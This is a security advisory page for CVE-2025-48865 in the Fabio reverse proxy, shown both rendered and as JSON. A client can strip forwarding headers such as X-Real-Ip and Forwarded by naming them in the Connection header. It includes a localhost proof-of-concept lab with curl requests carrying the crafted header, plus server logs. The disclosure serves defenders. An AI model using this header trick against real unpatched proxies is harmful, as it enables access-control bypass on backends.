ghsa-q7p4-7xjv-j3wf
Vulnerability from github
Published
2025-05-29 16:50
Modified
2025-05-30 15:25
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Summary
Fabio allows HTTP clients to manipulate custom headers it adds
Details

Summary

Fabio allows clients to remove X-Forwarded headers (except X-Forwarded-For) due to a vulnerability in how it processes hop-by-hop headers.

Fabio adds HTTP headers like X-Forwarded-Host and X-Forwarded-Port when routing requests to backend applications. Since the receiving application should trust these headers, allowing HTTP clients to remove or modify them creates potential security vulnerabilities.

However, it was found that some of these custom headers can indeed be removed and, in certain cases, manipulated. The attack relies on the behavior that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed:

Connection: close, X-Forwarded-Host

Similar critical vulnerabilities have been identified in other web servers and proxies, including CVE-2022-31813 in Apache HTTP Server and CVE-2024-45410 in Traefik.

Details

It was found that the following headers can be removed in this way (i.e. by specifying them within a connection header): - X-Forwarded-Host - X-Forwarded-Port - X-Forwarded-Proto - X-Real-Ip - Forwarded

PoC

The following docker-compose file was used for testing: ```yml version: '3' services: fabio: image: fabiolb/fabio ports: - "3000:9999" - "9998:9998" volumes: - ./fabio.properties:/etc/fabio/fabio.properties

backend: build: . ports: - "8080:8080" environment: - PYTHONUNBUFFERED=1 ```

The fabio.properties configuration: proxy.addr = :9999 ui.addr = :9998 registry.backend = static registry.static.routes = route add service / http://backend:8080/

A Python container runs a simple HTTP server that logs received headers. The Dockerfile: ```dockerfile FROM python:3.11-slim

WORKDIR /app

COPY app.py .

RUN pip install flask

EXPOSE 8080

CMD ["python", "app.py"] ```

Python Flask Server ```python from flask import Flask, request import sys import os

sys.stdout.flush() sys.stderr.flush() os.environ['PYTHONUNBUFFERED'] = '1'

app = Flask(name)

@app.before_request def log_request_info(): print("HEADERS:") for header_name, header_value in request.headers: print(f" {header_name}: {header_value}")

@app.route("/", methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH']) def hello(): return f"Hello, World! Method: {request.method}"

@app.route("/", methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH']) def catch_all(path): return f"Caught path: {path}, Method: {request.method}"

if name == "main": app.run(host="0.0.0.0", port=8080, debug=True) ```

A normal HTTP request/response pair looks like this:

Request

http GET / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: curl/8.7.1 Accept: */* Connection: keep-alive

curl command bash curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'User-Agent: curl/8.7.1' -H $'Accept: */*' -H $'Connection: keep-alive' \ $'http://127.0.0.1:3000/'

Response

```http HTTP/1.1 200 OK Server: Werkzeug/3.1.3 Python/3.11.12 Date: Thu, 22 May 2025 23:09:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 25 Connection: close

Hello, World! Method: GET ```

Server Log backend-1 | HEADERS: backend-1 | Host: 127.0.0.1:3000 backend-1 | User-Agent: curl/8.7.1 backend-1 | Accept: */* backend-1 | Forwarded: for=192.168.65.1; proto=http; by=172.24.0.3; httpproto=http/1.1 backend-1 | X-Forwarded-For: 192.168.65.1 backend-1 | X-Forwarded-Host: 127.0.0.1:3000 backend-1 | X-Forwarded-Port: 3000 backend-1 | X-Forwarded-Proto: http backend-1 | X-Real-Ip: 192.168.65.1

Next, a request, where the Forwarded header is defined as a hop-by-hop header via the Connection header is sent:

Request

http GET / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: curl/8.7.1 Accept: */* yeet: 123 Connection: keep-alive, Forwarded

curl command bash curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'User-Agent: curl/8.7.1' -H $'Accept: */*' -H $'Connection: keep-alive, Forwarded' \ $'http://127.0.0.1:3000/'

Response

```http HTTP/1.1 200 OK Content-Length: 25 Content-Type: text/html; charset=utf-8 Date: Thu, 22 May 2025 23:42:45 GMT Server: Werkzeug/3.1.3 Python/3.11.12

Hello, World! Method: GET ```

Server Logs backend-1 | HEADERS: backend-1 | Host: 127.0.0.1:3000 backend-1 | User-Agent: curl/8.7.1 backend-1 | Accept: */* backend-1 | X-Forwarded-For: 192.168.65.1 backend-1 | X-Forwarded-Host: 127.0.0.1:3000 backend-1 | X-Forwarded-Port: 3000 backend-1 | X-Forwarded-Proto: http backend-1 | X-Real-Ip: 192.168.65.1

The response shows that Fabio's Forwarded header was removed from the request

Impact

If the backend application trusts these custom headers for security-sensitive operations, their removal or modification may lead to vulnerabilities such as access control bypass.

This vulnerability has a critical severity rating similar to CVE-2022-31813 (Apache HTTP Server, 9.8) and CVE-2024-45410 (Traefik, 9.3)

Stripping headers like X-Real-IP can confuse the upstream server about whether the request is coming from an external client through the reverse proxy or from an internal source. This type of vulnerability can be exploited as demonstrated in: Versa Concerto RCE.

References

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.6.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fabiolb/fabio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48865"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-348"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T16:50:58Z",
    "nvd_published_at": "2025-05-30T07:15:23Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nFabio allows clients to remove X-Forwarded headers (except X-Forwarded-For) due to a vulnerability in how it processes hop-by-hop headers.\n\nFabio adds HTTP headers like X-Forwarded-Host and X-Forwarded-Port when routing requests to backend applications. Since the receiving application should trust these headers, allowing HTTP clients to remove or modify them creates potential security vulnerabilities.\n\nHowever, it was found that some of these custom headers can indeed be removed and, in certain cases, manipulated. The attack relies on the behavior that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed:\n\n```\nConnection: close, X-Forwarded-Host\n```\n\nSimilar critical vulnerabilities have been identified in other web servers and proxies, including [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813) in Apache HTTP Server and [CVE-2024-45410](https://github.com/advisories/GHSA-62c8-mh53-4cqv) in Traefik.\n\n### Details\nIt was found that the following headers can be removed in this way (i.e. by specifying them within a connection header):\n- X-Forwarded-Host\n- X-Forwarded-Port\n- X-Forwarded-Proto\n- X-Real-Ip\n- Forwarded\n\n### PoC\nThe following docker-compose file was used for testing:\n```yml\nversion: \u00273\u0027\nservices:\n  fabio:\n    image: fabiolb/fabio\n    ports:\n      - \"3000:9999\"\n      - \"9998:9998\"\n    volumes:\n      - ./fabio.properties:/etc/fabio/fabio.properties\n\n  backend:\n    build: .\n    ports:\n      - \"8080:8080\"\n    environment:\n      - PYTHONUNBUFFERED=1\n```\n\nThe fabio.properties configuration:\n```\nproxy.addr = :9999\nui.addr = :9998\nregistry.backend = static\nregistry.static.routes = route add service / http://backend:8080/\n```\n\nA Python container runs a simple HTTP server that logs received headers.\nThe Dockerfile:\n```dockerfile\nFROM python:3.11-slim\n\nWORKDIR /app\n\nCOPY app.py .\n\nRUN pip install flask\n\nEXPOSE 8080\n\nCMD [\"python\", \"app.py\"]\n```\n\nPython Flask Server\n```python\nfrom flask import Flask, request\nimport sys\nimport os\n\nsys.stdout.flush()\nsys.stderr.flush()\nos.environ[\u0027PYTHONUNBUFFERED\u0027] = \u00271\u0027\n\napp = Flask(__name__)\n\n@app.before_request\ndef log_request_info():\n    print(\"HEADERS:\")\n    for header_name, header_value in request.headers:\n        print(f\"   {header_name}: {header_value}\")\n\n@app.route(\"/\", methods=[\u0027GET\u0027, \u0027POST\u0027, \u0027PUT\u0027, \u0027DELETE\u0027, \u0027PATCH\u0027])\ndef hello():\n    return f\"Hello, World! Method: {request.method}\"\n\n@app.route(\"/\u003cpath:path\u003e\", methods=[\u0027GET\u0027, \u0027POST\u0027, \u0027PUT\u0027, \u0027DELETE\u0027, \u0027PATCH\u0027])\ndef catch_all(path):\n    return f\"Caught path: {path}, Method: {request.method}\"\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\", port=8080, debug=True)\n```\n\nA normal HTTP request/response pair looks like this:\n#### Request \n```http\nGET / HTTP/1.1\nHost: 127.0.0.1:3000\nUser-Agent: curl/8.7.1\nAccept: */*\nConnection: keep-alive\n```\n\ncurl command\n```bash\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: 127.0.0.1:3000\u0027 -H $\u0027User-Agent: curl/8.7.1\u0027 -H $\u0027Accept: */*\u0027 -H $\u0027Connection: keep-alive\u0027 \\\n    $\u0027http://127.0.0.1:3000/\u0027\n```\n#### Response\n```http\nHTTP/1.1 200 OK\nServer: Werkzeug/3.1.3 Python/3.11.12\nDate: Thu, 22 May 2025 23:09:12 GMT\nContent-Type: text/html; charset=utf-8\nContent-Length: 25\nConnection: close\n\nHello, World! Method: GET\n```\n\nServer Log\n```\nbackend-1  | HEADERS:\nbackend-1  |    Host: 127.0.0.1:3000\nbackend-1  |    User-Agent: curl/8.7.1\nbackend-1  |    Accept: */*\nbackend-1  |    Forwarded: for=192.168.65.1; proto=http; by=172.24.0.3; httpproto=http/1.1\nbackend-1  |    X-Forwarded-For: 192.168.65.1\nbackend-1  |    X-Forwarded-Host: 127.0.0.1:3000\nbackend-1  |    X-Forwarded-Port: 3000\nbackend-1  |    X-Forwarded-Proto: http\nbackend-1  |    X-Real-Ip: 192.168.65.1\n```\n\nNext, a request, where the Forwarded header is defined as a hop-by-hop header via the Connection header is sent:\n#### Request\n```http\nGET / HTTP/1.1\nHost: 127.0.0.1:3000\nUser-Agent: curl/8.7.1\nAccept: */*\nyeet: 123\nConnection: keep-alive, Forwarded\n```\n\ncurl command\n```bash\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: 127.0.0.1:3000\u0027 -H $\u0027User-Agent: curl/8.7.1\u0027 -H $\u0027Accept: */*\u0027 -H $\u0027Connection: keep-alive, Forwarded\u0027 \\\n    $\u0027http://127.0.0.1:3000/\u0027\n```\n#### Response\n```http\nHTTP/1.1 200 OK\nContent-Length: 25\nContent-Type: text/html; charset=utf-8\nDate: Thu, 22 May 2025 23:42:45 GMT\nServer: Werkzeug/3.1.3 Python/3.11.12\n\nHello, World! Method: GET\n```\n\nServer Logs\n```\nbackend-1  | HEADERS:\nbackend-1  |    Host: 127.0.0.1:3000\nbackend-1  |    User-Agent: curl/8.7.1\nbackend-1  |    Accept: */*\nbackend-1  |    X-Forwarded-For: 192.168.65.1\nbackend-1  |    X-Forwarded-Host: 127.0.0.1:3000\nbackend-1  |    X-Forwarded-Port: 3000\nbackend-1  |    X-Forwarded-Proto: http\nbackend-1  |    X-Real-Ip: 192.168.65.1\n```\n\nThe response shows that Fabio\u0027s `Forwarded` header was removed from the request\n\n### Impact\nIf the backend application trusts these custom headers for security-sensitive operations, their removal or modification may lead to vulnerabilities such as access control bypass.\n\nThis vulnerability has a critical severity rating similar to  [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813) (Apache HTTP Server, 9.8) and [CVE-2024-45410](https://github.com/advisories/GHSA-62c8-mh53-4cqv) (Traefik, 9.3)\n\nStripping headers like `X-Real-IP` can confuse the upstream server about whether the request is coming from an external client through the reverse proxy or from an internal source. This type of vulnerability can be exploited as demonstrated in: [Versa Concerto RCE](https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce).\n\n### References\n-  [CVE-2024-45410](https://github.com/advisories/GHSA-62c8-mh53-4cqv) \n-  [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813)\n- [Versa Concerto RCE](https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce)",
  "id": "GHSA-q7p4-7xjv-j3wf",
  "modified": "2025-05-30T15:25:57Z",
  "published": "2025-05-29T16:50:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fabiolb/fabio/security/advisories/GHSA-q7p4-7xjv-j3wf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48865"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fabiolb/fabio/commit/fdaf1e966162e9dd3b347ffdd0647b39dc71a1a3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fabiolb/fabio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fabiolb/fabio/releases/tag/v1.6.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fabio allows HTTP clients to manipulate custom headers it adds"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.